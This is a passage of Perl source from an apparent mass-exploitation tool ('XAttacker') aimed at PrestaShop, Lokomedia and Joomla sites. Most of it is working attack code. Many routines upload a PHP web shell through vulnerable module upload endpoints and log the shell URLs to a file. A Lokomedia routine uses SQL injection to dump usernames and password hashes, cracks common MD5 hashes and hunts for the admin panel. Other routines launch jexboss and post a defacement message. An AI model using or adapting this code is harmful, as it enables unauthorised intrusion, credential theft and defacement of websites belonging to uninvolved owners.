  5214. print color('bold white'),"wg24themeadministration";
  5215. print color('bold white')," ........... ";
  5216. print color('bold green'),"VULN\n";
  5217. print color('bold green')," [";
  5218. print color('bold red'),"+";
  5219. print color('bold green'),"] ";
  5220. print color('bold white'),"Shell Uploaded Successfully\n";
  5221. print color('bold white'),"  [Link] => $wg24themeadministrationup\n";
  5222. open (TEXT, '>>Result/Shells.txt');
  5223. print TEXT "$wg24themeadministrationup\n";
  5224. close (TEXT);
  5225. }else{
  5226. print color('bold red'),"[";
  5227. print color('bold green'),"+";
  5228. print color('bold red'),"] ";
  5229. print color('bold white'),"wg24themeadministration";
  5230. print color('bold white')," ........... ";
  5231. print color('bold red'),"Failed\n";
  5232. }
  5233. }
  5234.  
  5235. ################ fieldvmegamenu #####################
  5236. sub fieldvmegamenu(){
  5237. my $url = "$site/modules/fieldvmegamenu/ajax/upload.php";
  5238. my $shell ="tool/XAttacker.php";
  5239. my $field_name = "images[]";
  5240.  
  5241. my $response = $ua->post( $url,
  5242.             Content_Type => 'multipart/form-data',
  5243.             Content => [ $field_name => ["$shell"] ]
  5244.            
  5245.             );
  5246. $fieldvmegamenuup="$site/modules/fieldvmegamenu/uploads/XAttacker.php?X=Attacker";
  5247.  
  5248. my $checkfieldvmegamenu = $ua->get("$fieldvmegamenuup")->content;
  5249. if($checkfieldvmegamenu =~/X Attacker/) {
  5250.  
  5251. print color('bold red'),"[";
  5252. print color('bold green'),"+";
  5253. print color('bold red'),"] ";
  5254. print color('bold white'),"fieldvmegamenu";
  5255. print color('bold white')," .................... ";
  5256. print color('bold green'),"VULN\n";
  5257. print color('bold green')," [";
  5258. print color('bold red'),"+";
  5259. print color('bold green'),"] ";
  5260. print color('bold white'),"Shell Uploaded Successfully\n";
  5261. print color('bold white'),"  [Link] => $fieldvmegamenuup\n";
  5262. open (TEXT, '>>Result/Shells.txt');
  5263. print TEXT "$fieldvmegamenuup\n";
  5264. close (TEXT);
  5265. }else{
  5266. print color('bold red'),"[";
  5267. print color('bold green'),"+";
  5268. print color('bold red'),"] ";
  5269. print color('bold white'),"fieldvmegamenu";
  5270. print color('bold white')," .................... ";
  5271. print color('bold red'),"Failed\n";
  5272. }
  5273. }
  5274.  
  5275.  
  5276. ################ wdoptionpanel #####################
  5277. sub wdoptionpanel(){
  5278. my $url = "$site/modules/wdoptionpanel/wdoptionpanel_ajax.php";
  5279. my $response = $ua->post($url, Content_Type => 'multipart/form-data', data => 'bajatax', type => 'image_upload', Content => [bajatax => ["tool/XAttacker.php"],]);
  5280.  
  5281. $wdoptionpanelup="$site/modules/wdoptionpanel/upload/XAttacker.php?X=Attacker";
  5282.  
  5283. my $checkwdoptionpanel = $ua->get("$wdoptionpanelup")->content;
  5284. if($checkwdoptionpanel =~/X Attacker/) {
  5285.  
  5286. print color('bold red'),"[";
  5287. print color('bold green'),"+";
  5288. print color('bold red'),"] ";
  5289. print color('bold white'),"wdoptionpanel";
  5290. print color('bold white')," ..................... ";
  5291. print color('bold green'),"VULN\n";
  5292. print color('bold green')," [";
  5293. print color('bold red'),"+";
  5294. print color('bold green'),"] ";
  5295. print color('bold white'),"Shell Uploaded Successfully\n";
  5296. print color('bold white'),"  [Link] => $wdoptionpanelup\n";
  5297. open (TEXT, '>>Result/Shells.txt');
  5298. print TEXT "$wdoptionpanelup\n";
  5299. close (TEXT);
  5300. }else{
  5301. print color('bold red'),"[";
  5302. print color('bold green'),"+";
  5303. print color('bold red'),"] ";
  5304. print color('bold white'),"wdoptionpanel";
  5305. print color('bold white')," ..................... ";
  5306. print color('bold red'),"Failed\n";
  5307. }
  5308. }
  5309.  
  5310.  
  5311. ################ pk_flexmenu #####################
  5312. sub pk_flexmenu(){
  5313. my $url = "$site/modules/pk_flexmenu/ajax/upload.php";
  5314. my $shell ="tool/XAttacker.php";
  5315. my $field_name = "images[]";
  5316.  
  5317. my $response = $ua->post( $url,
  5318.             Content_Type => 'multipart/form-data',
  5319.             Content => [ $field_name => ["$shell"] ]
  5320.            
  5321.             );
  5322. $pk_flexmenuup="$site/modules/pk_flexmenu/uploads/XAttacker.php?X=Attacker";
  5323.  
  5324. my $checkpk_flexmenu = $ua->get("$pk_flexmenuup")->content;
  5325. if($checkpk_flexmenu =~/X Attacker/) {
  5326.  
  5327. print color('bold red'),"[";
  5328. print color('bold green'),"+";
  5329. print color('bold red'),"] ";
  5330. print color('bold white'),"pk_flexmenu";
  5331. print color('bold white')," ....................... ";
  5332. print color('bold green'),"VULN\n";
  5333. print color('bold green')," [";
  5334. print color('bold red'),"+";
  5335. print color('bold green'),"] ";
  5336. print color('bold white'),"Shell Uploaded Successfully\n";
  5337. print color('bold white'),"  [Link] => $pk_flexmenuup\n";
  5338. open (TEXT, '>>Result/Shells.txt');
  5339. print TEXT "$pk_flexmenuup\n";
  5340. close (TEXT);
  5341. }else{
  5342. print color('bold red'),"[";
  5343. print color('bold green'),"+";
  5344. print color('bold red'),"] ";
  5345. print color('bold white'),"pk_flexmenu";
  5346. print color('bold white')," ....................... ";
  5347. print color('bold red'),"Failed\n";
  5348. }
  5349. }
  5350.  
  5351. ################ pk_vertflexmenu #####################
  5352. sub pk_vertflexmenu(){
  5353. my $url = "$site/modules/pk_vertflexmenu/ajax/upload.php";
  5354. my $shell ="tool/XAttacker.php";
  5355. my $field_name = "images[]";
  5356.  
  5357. my $response = $ua->post( $url,
  5358.             Content_Type => 'multipart/form-data',
  5359.             Content => [ $field_name => ["$shell"] ]
  5360.            
  5361.             );
  5362. $pk_vertflexmenuup="$site/modules/pk_vertflexmenu/uploads/XAttacker.php?X=Attacker";
  5363.  
  5364. my $checkpk_vertflexmenu = $ua->get("$pk_vertflexmenuup")->content;
  5365. if($checkpk_vertflexmenu =~/X Attacker/) {
  5366.  
  5367. print color('bold red'),"[";
  5368. print color('bold green'),"+";
  5369. print color('bold red'),"] ";
  5370. print color('bold white'),"pk_vertflexmenu";
  5371. print color('bold white')," ................... ";
  5372. print color('bold green'),"VULN\n";
  5373. print color('bold green')," [";
  5374. print color('bold red'),"+";
  5375. print color('bold green'),"] ";
  5376. print color('bold white'),"Shell Uploaded Successfully\n";
  5377. print color('bold white'),"  [Link] => $pk_vertflexmenuup\n";
  5378.  
  5379. open (TEXT, '>>Result/Shells.txt');
  5380. print TEXT "$pk_vertflexmenuup\n";
  5381. close (TEXT);
  5382. }else{
  5383. print color('bold red'),"[";
  5384. print color('bold green'),"+";
  5385. print color('bold red'),"] ";
  5386. print color('bold white'),"pk_vertflexmenu";
  5387. print color('bold white')," ................... ";
  5388. print color('bold red'),"Failed\n";
  5389. }
  5390. }
  5391.  
  5392. ################ nvn_export_orders #####################
  5393. sub nvn_export_orders(){
  5394. my $url = "$site/modules/nvn_export_orders/upload.php";
  5395. my $shell ="tool/nvn_extra_add.php";
  5396. my $field_name = "images[]";
  5397.  
  5398. my $response = $ua->post( $url,
  5399.             Content_Type => 'multipart/form-data',
  5400.             Content => [ $field_name => ["$shell"] ]
  5401.            
  5402.             );
  5403. $nvn_export_ordersup="$site/modules/nvn_export_orders/nvn_extra_add.php?X=Attacker";
  5404.  
  5405. my $checknvn_export_orders = $ua->get("$nvn_export_ordersup")->content;
  5406. if($checknvn_export_orders =~/X Attacker/) {
  5407.  
  5408. print color('bold red'),"[";
  5409. print color('bold green'),"+";
  5410. print color('bold red'),"] ";
  5411. print color('bold white'),"nvn_export_orders";
  5412. print color('bold white')," ................. ";
  5413. print color('bold green'),"VULN\n";
  5414. print color('bold green')," [";
  5415. print color('bold red'),"+";
  5416. print color('bold green'),"] ";
  5417. print color('bold white'),"Shell Uploaded Successfully\n";
  5418. print color('bold white'),"  [Link] => $nvn_export_ordersup\n";
  5419. open (TEXT, '>>Result/Shells.txt');
  5420. print TEXT "$nvn_export_ordersup\n";
  5421. close (TEXT);
  5422. }else{
  5423. print color('bold red'),"[";
  5424. print color('bold green'),"+";
  5425. print color('bold red'),"] ";
  5426. print color('bold white'),"nvn_export_orders";
  5427. print color('bold white')," ................. ";
  5428. print color('bold red'),"Failed\n";
  5429. }
  5430. }
  5431.  
  5432. ################ megamenu #####################
  5433. sub megamenu(){
  5434. my $url = "$site/modules/megamenu/uploadify/uploadify.php?id=XAttacker.php";
  5435. my $shell ="tool/XAttacker.php.png";
  5436. my $field_name = "Filedata";
  5437.  
  5438. my $response = $ua->post( $url,
  5439.             Content_Type => 'multipart/form-data',
  5440.             Content => [ $field_name => ["$shell"] ]
  5441.            
  5442.             );
  5443. $megamenuup="$site/XAttacker.php.png?X=Attacker";
  5444.  
  5445. my $checkmegamenu = $ua->get("$megamenuup")->content;
  5446. if($checkmegamenu =~/X Attacker/) {
  5447.  
  5448. print color('bold red'),"[";
  5449. print color('bold green'),"+";
  5450. print color('bold red'),"] ";
  5451. print color('bold white'),"megamenu";
  5452. print color('bold white')," .......................... ";
  5453. print color('bold green'),"VULN\n";
  5454. print color('bold green')," [";
  5455. print color('bold red'),"+";
  5456. print color('bold green'),"] ";
  5457. print color('bold white'),"Shell Uploaded Successfully\n";
  5458. print color('bold white'),"  [Link] => $megamenuup\n";
  5459. open (TEXT, '>>Result/Shells.txt');
  5460. print TEXT "$megamenuup\n";
  5461. close (TEXT);
  5462. }else{
  5463. print color('bold red'),"[";
  5464. print color('bold green'),"+";
  5465. print color('bold red'),"] ";
  5466. print color('bold white'),"megamenu";
  5467. print color('bold white')," .......................... ";
  5468. print color('bold red'),"Failed\n";
  5469. }
  5470. }
  5471.  
  5472. ################ tdpsthemeoptionpanel #####################
  5473. sub tdpsthemeoptionpanel(){
  5474. my $url = "$site/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php";
  5475. my $shell ="tool/XAttacker.php";
  5476. my $field_name = "image_upload";
  5477.  
  5478. my $response = $ua->post( $url,
  5479.             Content_Type => 'multipart/form-data',
  5480.             data => 'bajatax',
  5481.             Content => [ $field_name => ["$shell"] ]
  5482.            
  5483.             );
  5484. $tdpsthemeoptionpanelup="$site/modules/tdpsthemeoptionpanel/upload/XAttacker.php?X=Attacker";
  5485.  
  5486. my $checktdpsthemeoptionpanel = $ua->get("$tdpsthemeoptionpanelup")->content;
  5487. if($checktdpsthemeoptionpanel =~/X Attacker/) {
  5488.  
  5489. print color('bold red'),"[";
  5490. print color('bold green'),"+";
  5491. print color('bold red'),"] ";
  5492. print color('bold white'),"tdpsthemeoptionpanel";
  5493. print color('bold white')," .............. ";
  5494. print color('bold green'),"VULN\n";
  5495. print color('bold green')," [";
  5496. print color('bold red'),"+";
  5497. print color('bold green'),"] ";
  5498. print color('bold white'),"Shell Uploaded Successfully\n";
  5499. print color('bold white'),"  [Link] => $tdpsthemeoptionpanelup\n";
  5500. open (TEXT, '>>Result/Shells.txt');
  5501. print TEXT "$tdpsthemeoptionpanelup\n";
  5502. close (TEXT);
  5503. }else{
  5504. print color('bold red'),"[";
  5505. print color('bold green'),"+";
  5506. print color('bold red'),"] ";
  5507. print color('bold white'),"tdpsthemeoptionpanel";
  5508. print color('bold white')," .............. ";
  5509. print color('bold red'),"Failed\n";
  5510. }
  5511. }
  5512.  
  5513.  
  5514. ################ psmodthemeoptionpanel #####################
  5515. sub psmodthemeoptionpanel(){
  5516. my $url = "$site/modules/psmodthemeoptionpanel/psmodthemeoptionpanel_ajax.php";
  5517. my $shell ="tool/XAttacker.php";
  5518. my $field_name = "image_upload";
  5519.  
  5520. my $response = $ua->post( $url,
  5521.             Content_Type => 'multipart/form-data',
  5522.             data => 'bajatax',
  5523.             Content => [ $field_name => ["$shell"] ]
  5524.            
  5525.             );
  5526. $psmodthemeoptionpanelup="$site/modules/psmodthemeoptionpanel/upload/XAttacker.php?X=Attacker";
  5527.  
  5528. my $checkpsmodthemeoptionpanel = $ua->get("$psmodthemeoptionpanelup")->content;
  5529. if($checkpsmodthemeoptionpanel =~/X Attacker/) {
  5530.  
  5531. print color('bold red'),"[";
  5532. print color('bold green'),"+";
  5533. print color('bold red'),"] ";
  5534. print color('bold white'),"psmodthemeoptionpanel";
  5535. print color('bold white')," ............. ";
  5536. print color('bold green'),"VULN\n";
  5537. print color('bold green')," [";
  5538. print color('bold red'),"+";
  5539. print color('bold green'),"] ";
  5540. print color('bold white'),"Shell Uploaded Successfully\n";
  5541. print color('bold white'),"  [Link] => $psmodthemeoptionpanelup\n";
  5542. open (TEXT, '>>Result/Shells.txt');
  5543. print TEXT "$psmodthemeoptionpanelup\n";
  5544. close (TEXT);
  5545. }else{
  5546. print color('bold red'),"[";
  5547. print color('bold green'),"+";
  5548. print color('bold red'),"] ";
  5549. print color('bold white'),"psmodthemeoptionpanel";
  5550. print color('bold white')," ............. ";
  5551. print color('bold red'),"Failed\n";
  5552. }
  5553. }
  5554.  
  5555.  
  5556. ################ masseditproduct #####################
  5557. sub masseditproduct(){
  5558. my $url = "$site/modules/lib/redactor/file_upload.php";
  5559. my $shell ="tool/XAttacker.php";
  5560. my $field_name = "file";
  5561.  
  5562. my $response = $ua->post( $url,
  5563.             Content_Type => 'multipart/form-data',
  5564.             Content => [ $field_name => ["$shell"] ]
  5565.            
  5566.             );
  5567. $masseditproductup="$site/masseditproduct/uploads/file/XAttacker.php?X=Attacker";
  5568.  
  5569. my $checkmasseditproduct = $ua->get("$masseditproductup")->content;
  5570. if($checkmasseditproduct =~/X Attacker/) {
  5571.  
  5572. print color('bold red'),"[";
  5573. print color('bold green'),"+";
  5574. print color('bold red'),"] ";
  5575. print color('bold white'),"masseditproduct";
  5576. print color('bold white')," ................... ";
  5577. print color('bold green'),"VULN\n";
  5578. print color('bold green')," [";
  5579. print color('bold red'),"+";
  5580. print color('bold green'),"] ";
  5581. print color('bold white'),"Shell Uploaded Successfully\n";
  5582. print color('bold white'),"  [Link] => $masseditproductup\n";
  5583. open (TEXT, '>>Result/Shells.txt');
  5584. print TEXT "$masseditproductup\n";
  5585. close (TEXT);
  5586. }else{
  5587. print color('bold red'),"[";
  5588. print color('bold green'),"+";
  5589. print color('bold red'),"] ";
  5590. print color('bold white'),"masseditproduct";
  5591. print color('bold white')," ................... ";
  5592. print color('bold red'),"Failed\n";
  5593. }
  5594. }
  5595.  
  5596.  
  5597. ################ blocktestimonial #####################
  5598. sub blocktestimonial(){
  5599. my $url = "$site/modules/blocktestimonial/addtestimonial.php";
  5600.  
  5601.  
  5602. my $response = $ua->post( $url,
  5603.             testimonial_submitter_name => "indoxploit",
  5604.             testimonial_title => "hacked by indoxploit",
  5605.             testimonial_main_message => "hacked by indoxploit",        
  5606.             testimonial_img => "tool/XAttacker.php",
  5607.             testimonial => "Submit Testimonial"        
  5608.            
  5609.             );
  5610. $blocktestimonialup="$site/upload/XAttacker.php?X=Attacker";
  5611.  
  5612. my $checkblocktestimonial = $ua->get("$blocktestimonialup")->content;
  5613. if($checkblocktestimonial =~/X Attacker/) {
  5614.  
  5615. print color('bold red'),"[";
  5616. print color('bold green'),"+";
  5617. print color('bold red'),"] ";
  5618. print color('bold white'),"blocktestimonial";
  5619. print color('bold white')," ............. ";
  5620. print color('bold green'),"VULN\n";
  5621. print color('bold green')," [";
  5622. print color('bold red'),"+";
  5623. print color('bold green'),"] ";
  5624. print color('bold white'),"Shell Uploaded Successfully\n";
  5625. print color('bold white'),"  [Link] => $blocktestimonialup\n";
  5626. open (TEXT, '>>Result/Shells.txt');
  5627. print TEXT "$blocktestimonialup\n";
  5628. close (TEXT);
  5629. }else{
  5630. print color('bold red'),"[";
  5631. print color('bold green'),"+";
  5632. print color('bold red'),"] ";
  5633. print color('bold white'),"blocktestimonial";
  5634. print color('bold white')," ................... ";
  5635. print color('bold red'),"Failed\n";
  5636. }
  5637. }
  5638. ################ Jexboss #####################
  5639. sub jexboss(){
  5640. system("python tool/jexboss.py $site");
  5641. }
  5642.  
  5643. ################ lokomedia #####################
  5644. sub lokomedia(){
  5645. $lokoversion = "$site/statis--7'union select /*!50000Concat*/(Version())+from+users--+--+kantordesa.html";
  5646. $lokodatabase = "$site/statis--7'union select /*!50000Concat*/(Database())+from+users--+--+kantordesa.html";
  5647. $lokouserdata = "$site/statis--7'union select /*!50000Concat*/(USER())+from+users--+--+kantordesa.html";
  5648. $lokouser = "$site/statis--7'union select /*!50000Concat*/(username)+from+users--+--+kantordesa.html";
  5649. $lokopass = "$site/statis--7'union select /*!50000Concat*/(password)+from+users--+--+kantordesa.html";
  5650.  
  5651. my $checklokoversion = $ua->get("$lokoversion")->content;
  5652. if($checklokoversion =~/<meta name="description" content="(.*)">/) {
  5653. $dbv=$1;
  5654.  
  5655. if($dbv =~ /[a-z]/){
  5656. print color('bold green')," [";
  5657. print color('bold red'),"+";
  5658. print color('bold green'),"] ";
  5659. print color('bold white')," MySQL Version : $dbv\n";
  5660. open (TEXT, '>>Result/databases.txt');
  5661. print TEXT "\n[ DATABASE ]\n";
  5662. print TEXT "$site";
  5663. print TEXT "\nMySQL Version : $dbv";
  5664. close (TEXT);
  5665. my $checklokodatabase = $ua->get("$lokodatabase")->content;
  5666. if($checklokodatabase =~/<meta name="description" content="(.*)">/) {
  5667. $db=$1;
  5668. print color('bold green')," [";
  5669. print color('bold red'),"+";
  5670. print color('bold green'),"] ";
  5671. print color('bold white')," Current Database : $db\n";
  5672. open (TEXT, '>>Result/databases.txt');
  5673. print TEXT "\nCurrent Database : $db";
  5674. close (TEXT);
  5675. }
  5676. my $checklokouserdata = $ua->get("$lokouserdata")->content;
  5677. if($checklokouserdata =~/<meta name="description" content="(.*)">/) {
  5678. $udb=$1;
  5679. print color('bold green')," [";
  5680. print color('bold red'),"+";
  5681. print color('bold green'),"] ";
  5682. print color('bold white')," Current Username : $udb\n";
  5683. }
  5684. my $checklokouser = $ua->get("$lokouser")->content;
  5685. if($checklokouser =~/<meta name="description" content="(.*)">/) {
  5686. $user=$1;
  5687. print color('bold green')," [";
  5688. print color('bold red'),"+";
  5689. print color('bold green'),"] ";
  5690. print color('bold white')," Username : $user\n";
  5691. open (TEXT, '>>Result/databases.txt');
  5692. print TEXT "\nUsername : $user";
  5693. close (TEXT);
  5694. }
  5695. my $checklokopass = $ua->get("$lokopass")->content;
  5696. if($checklokopass =~/<meta name="description" content="(.*)">/) {
  5697. $hash=$1;
  5698. print color('bold green')," [";
  5699. print color('bold red'),"+";
  5700. print color('bold green'),"] ";
  5701. print color('bold white')," Hash Pass : $hash\n";
  5702. open (TEXT, '>>Result/databases.txt');
  5703. print TEXT "\nHash Pass : $hash";
  5704. close (TEXT);
  5705. lokohash();
  5706. lokopanel();
  5707. }
  5708. }
  5709. }
  5710. }
  5711. sub lokohash(){
  5712. if ($hash =~ /a66abb5684c45962d887564f08346e8d/){
  5713. print color('bold green')," [";
  5714. print color('bold red'),"+";
  5715. print color('bold green'),"] ";
  5716. print color('bold white'),"Cracking Hash : ";
  5717. print color('bold green'),"Found!";
  5718. print color('bold green')," [";
  5719. print color('bold red'),"+";
  5720. print color('bold green'),"]  ";
  5721. print color('bold white'),"Password : admin123456\n";
  5722. open (TEXT, '>>Result/databases.txt');
  5723. print TEXT "\nPassword : admin123456";
  5724. close (TEXT);
  5725. }
  5726. elsif ($hash =~ /0192023a7bbd73250516f069df18b500/){
  5727. print color('bold green')," [";
  5728. print color('bold red'),"+";
  5729. print color('bold green'),"] ";
  5730. print color('bold white'),"Cracking Hash : ";
  5731. print color('bold green'),"Found!";
  5732. print color('bold green')," [";
  5733. print color('bold red'),"+";
  5734. print color('bold green'),"]  ";
  5735. print color('bold white'),"Password : admin123\n";
  5736. open (TEXT, '>>Result/databases.txt');
  5737. print TEXT "\nPassword : admin123";
  5738. close (TEXT);
  5739. }
  5740. elsif ($hash =~ /73acd9a5972130b75066c82595a1fae3/){
  5741. print color('bold green')," [";
  5742. print color('bold red'),"+";
  5743. print color('bold green'),"] ";
  5744. print color('bold white'),"Cracking Hash : ";
  5745. print color('bold green'),"Found!";
  5746. print color('bold green')," [";
  5747. print color('bold red'),"+";
  5748. print color('bold green'),"]  ";
  5749. print color('bold white'),"Password : ADMIN\n";
  5750. open (TEXT, '>>Result/databases.txt');
  5751. print TEXT "\nPassword : ADMIN";
  5752. close (TEXT);
  5753. }
  5754. elsif ($hash =~ /7b7bc2512ee1fedcd76bdc68926d4f7b/){
  5755. print color('bold green')," [";
  5756. print color('bold red'),"+";
  5757. print color('bold green'),"] ";
  5758. print color('bold white'),"Cracking Hash : ";
  5759. print color('bold green'),"Found!";
  5760. print color('bold green')," [";
  5761. print color('bold red'),"+";
  5762. print color('bold green'),"]  ";
  5763. print color('bold white'),"Password : Administrator\n";
  5764. open (TEXT, '>>Result/databases.txt');
  5765. print TEXT "\nPassword : Administrator";
  5766. close (TEXT);
  5767. }
  5768. elsif ($hash =~ /c21f969b5f03d33d43e04f8f136e7682/){
  5769. print color('bold green')," [";
  5770. print color('bold red'),"+";
  5771. print color('bold green'),"] ";
  5772. print color('bold white'),"Cracking Hash : ";
  5773. print color('bold green'),"Found!";
  5774. print color('bold green')," [";
  5775. print color('bold red'),"+";
  5776. print color('bold green'),"]  ";
  5777. print color('bold white'),"Password : default\n";
  5778. open (TEXT, '>>Result/databases.txt');
  5779. print TEXT "\nPassword : default";
  5780. close (TEXT);
  5781. }
  5782. elsif ($hash =~ /1a1dc91c907325c69271ddf0c944bc72/){
  5783. print color('bold green')," [";
  5784. print color('bold red'),"+";
  5785. print color('bold green'),"] ";
  5786. print color('bold white'),"Cracking Hash : ";
  5787. print color('bold green'),"Found!";
  5788. print color('bold green')," [";
  5789. print color('bold red'),"+";
  5790. print color('bold green'),"]  ";
  5791. print color('bold white'),"Password : pass\n";
  5792. open (TEXT, '>>Result/databases.txt');
  5793. print TEXT "\nPassword : pass";
  5794. close (TEXT);
  5795. }
  5796. elsif ($hash =~ /5f4dcc3b5aa765d61d8327deb882cf99/){
  5797. print color('bold green')," [";
  5798. print color('bold red'),"+";
  5799. print color('bold green'),"] ";
  5800. print color('bold white'),"Cracking Hash : ";
  5801. print color('bold green'),"Found!";
  5802. print color('bold green')," [";
  5803. print color('bold red'),"+";
  5804. print color('bold green'),"]  ";
  5805. print color('bold white'),"Password : password\n";
  5806. open (TEXT, '>>Result/databases.txt');
  5807. print TEXT "\nPassword : password";
  5808. close (TEXT);
  5809. }
  5810. elsif ($hash =~ /098f6bcd4621d373cade4e832627b4f6/){
  5811. print color('bold green')," [";
  5812. print color('bold red'),"+";
  5813. print color('bold green'),"] ";
  5814. print color('bold white'),"Cracking Hash : ";
  5815. print color('bold green'),"Found!";
  5816. print color('bold green')," [";
  5817. print color('bold red'),"+";
  5818. print color('bold green'),"]  ";
  5819. print color('bold white'),"Password : test\n";
  5820. open (TEXT, '>>Result/databases.txt');
  5821. print TEXT "\nPassword : test";
  5822. close (TEXT);
  5823. }
  5824. elsif ($hash =~ /21232f297a57a5a743894a0e4a801fc3/){
  5825. print color('bold green')," [";
  5826. print color('bold red'),"+";
  5827. print color('bold green'),"] ";
  5828. print color('bold white'),"Cracking Hash : ";
  5829. print color('bold green'),"Found!";
  5830. print color('bold green')," [";
  5831. print color('bold red'),"+";
  5832. print color('bold green'),"]  ";
  5833. print color('bold white'),"Password : admin\n";
  5834. open (TEXT, '>>Result/databases.txt');
  5835. print TEXT "\nPassword : admin";
  5836. close (TEXT);
  5837. }
  5838. elsif ($hash =~ /fe01ce2a7fbac8fafaed7c982a04e229/){
  5839. print color('bold green')," [";
  5840. print color('bold red'),"+";
  5841. print color('bold green'),"] ";
  5842. print color('bold white'),"Cracking Hash : ";
  5843. print color('bold green'),"Found!\n";
  5844. print color('bold green')," [";
  5845. print color('bold red'),"+";
  5846. print color('bold green'),"]  ";
  5847. print color('bold white'),"Password : demo\n";
  5848. open (TEXT, '>>Result/databases.txt');
  5849. print TEXT "\nPassword : demo";
  5850. close (TEXT);
  5851. }
  5852. else{
  5853. print color('bold green')," [";
  5854. print color('bold red'),"+";
  5855. print color('bold green'),"]  ";
  5856. print color('bold white'),"Password : ";
  5857. print color('bold red'),"Failed\n";
  5858. }
  5859. }
  5860.  
  5861. sub lokopanel(){
  5862. $ua = LWP::UserAgent->new();
  5863. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  5864. $ua->timeout(15);
  5865. $pathone = "$site/redaktur";
  5866. my $lokomediacms = $ua->get("$pathone")->content;
  5867. if($lokomediapathone =~/administrator|username|password/) {
  5868.   print color('bold green')," [";
  5869. print color('bold red'),"+";
  5870. print color('bold green'),"] ";
  5871. print color('bold white'),"Admin Panel : ";
  5872. print color('bold green'),"Found!\n";
  5873. print color('bold green')," [";
  5874. print color('bold red'),"+";
  5875. print color('bold green'),"]  ";
  5876. print color('bold white'),"URL : $pathone\n";
  5877. open (TEXT, '>>Result/databases.txt');
  5878. print TEXT "\nURL : $pathone";
  5879. close (TEXT);
  5880. }
  5881. else{
  5882. print color('bold green')," [";
  5883. print color('bold red'),"+";
  5884. print color('bold green'),"]  ";
  5885. print color('bold white'),"Admin Panel : ";
  5886. print color('bold red'),"Failed\n";
  5887. }
  5888. }
  5889.  
  5890. ################################################################
  5891. #                                                              #    
  5892. #                            JOOMLA                            #
  5893. #                                                              #                                                                
  5894. ################################################################
  5895.  
  5896. ################ Version #####################
  5897. sub versij(){
  5898.  
  5899. my $url = "$site/language/en-GB/en-GB.xml";
  5900. my $checkomusersc = $ua->get("$url")->content;
  5901.  
  5902. if($checkomusersc =~/<version>(.*)</) {
  5903. print color('bold red'),"[";
  5904. print color('bold green'),"+";
  5905. print color('bold red'),"] ";
  5906. print color('bold white'),"Joomla Version";
  5907. print color('bold white')," .................... ";
  5908. print color('bold white'),"";
  5909. print color('bold green'),"$1";
  5910. print color('bold white'),"\n";
  5911.  
  5912. open (TEXT, '>>Result/version.txt');
  5913. print TEXT "joom => $site => $1\n";
  5914. close (TEXT);
  5915. }
  5916.  
  5917. sub comjce(){
  5918. $ua = LWP::UserAgent->new();
  5919. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  5920. $ua->timeout(15);
  5921.  
  5922.  
  5923. my $jceurl="$site/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
  5924.  
  5925. my $res = $ua->post($jceurl,
  5926.     Content_Type => 'form-data',
  5927.     Content => [
  5928.         'upload-dir' => './../../',
  5929.         'upload-overwrite' => 0,
  5930.         'Filedata' => ["tool/XAttacker.gif"],
  5931.         'action' => 'upload'
  5932.         ]
  5933.     )->decoded_content;
  5934.  
  5935. $remote = IO::Socket::INET->new(
  5936.         Proto=>'tcp',
  5937.         PeerAddr=>"$site",
  5938.         PeerPort=>80,
  5939.         Timeout=>15
  5940.         );
  5941. $jceup= "$site/XAttacker.gif";
  5942. $check = $ua->get($jceup)->status_line;
  5943. if ($check =~ /200/){
  5944. print color('bold red'),"[";
  5945. print color('bold green'),"+";
  5946. print color('bold red'),"] ";
  5947. print color('bold white'),"Com Jce";
  5948. print color('bold white')," ........................... ";
  5949. print color('bold green'),"VULN\n";
  5950. print color('bold green')," [";
  5951. print color('bold red'),"+";
  5952. print color('bold green'),"] ";
  5953. print color('bold white'),"Picture Uploaded Successfully\n";
  5954. print color('bold white'),"  [Link] => $jceup\n";
  5955. open (TEXT, '>>Result/index.txt');
  5956. print TEXT "$jceup\n";
  5957. close (TEXT);
  5958. }else{
  5959. print color('bold red'),"[";
  5960. print color('bold green'),"+";
  5961. print color('bold red'),"] ";
  5962. print color('bold white'),"Com Jce";
  5963. print color('bold white')," ........................... ";
  5964. print color('bold red'),"Failed\n";
  5965. }
  5966. }
  5967.  
  5968. ################ joom plugin #####################
  5969. sub txrt(){
  5970. my $url = "$site/administrator/components/com_simplephotogallery/lib/uploadFile.php";
  5971.  
  5972. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => ['uploadfile' => ["tool/XAttacker.php"], "jpath" => "..%2F..%2F..%2F..%2F" ]);
  5973.  
  5974. if ($response->content =~ /XAttacker(.*?)php/) {
  5975. $uploadfolder=$1.'php?X=Attacker';
  5976. }
  5977. $zoomerup="$site/XAttacker'.$uploadfolder.'";
  5978. my $checkdm = $ua->get("$zoomerup")->content;
  5979. if($checkdm =~/X Attacker/) {
  5980. print color('bold red'),"[";
  5981. print color('bold green'),"+";
  5982. print color('bold red'),"] ";
  5983. print color('bold white'),"com_simplephotogallery";
  5984. print color('bold white')," .............. ";
  5985. print color('bold green'),"VULN";
  5986. print color('bold white'),"\n";
  5987. print color('bold green')," [";
  5988. print color('bold red'),"+";
  5989. print color('bold green'),"] ";
  5990. print color('bold white'),"Shell Uploaded Successfully\n";
  5991. print color('bold white'),"  [Link] => $zoomerup\n";
  5992. open (TEXT, '>>Result/Shells.txt');
  5993. print TEXT "$zoomerup\n";
  5994. close (TEXT);
  5995. }else{
  5996. print color('bold red'),"[";
  5997. print color('bold green'),"+";
  5998. print color('bold red'),"] ";
  5999. print color('bold white'),"com_simplephotogallery";
  6000. print color('bold white')," ............ ";
  6001. print color('bold red'),"Failed";
  6002. print color('bold white'),"\n";
  6003. }
  6004. }
  6005. ################ Com Media #####################
  6006. sub comedia(){
  6007. my $url = "$site/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
  6008. my $index ="tool/XAttacker.txt";
  6009. my $field_name = "Filedata[]";
  6010.  
  6011. my $response = $ua->post( $url,
  6012.             Content_Type => 'form-data',
  6013.             Content => [ $field_name => ["$index"] ]
  6014.            
  6015.             );
  6016.  
  6017. $mediaup="$site/images/XAttacker.txt";
  6018.  
  6019. $checkpofwup = $ua->get("$mediaup")->content;
  6020. if($checkpofwup =~/HaCKeD/) {
  6021. print color('bold red'),"[";
  6022. print color('bold green'),"+";
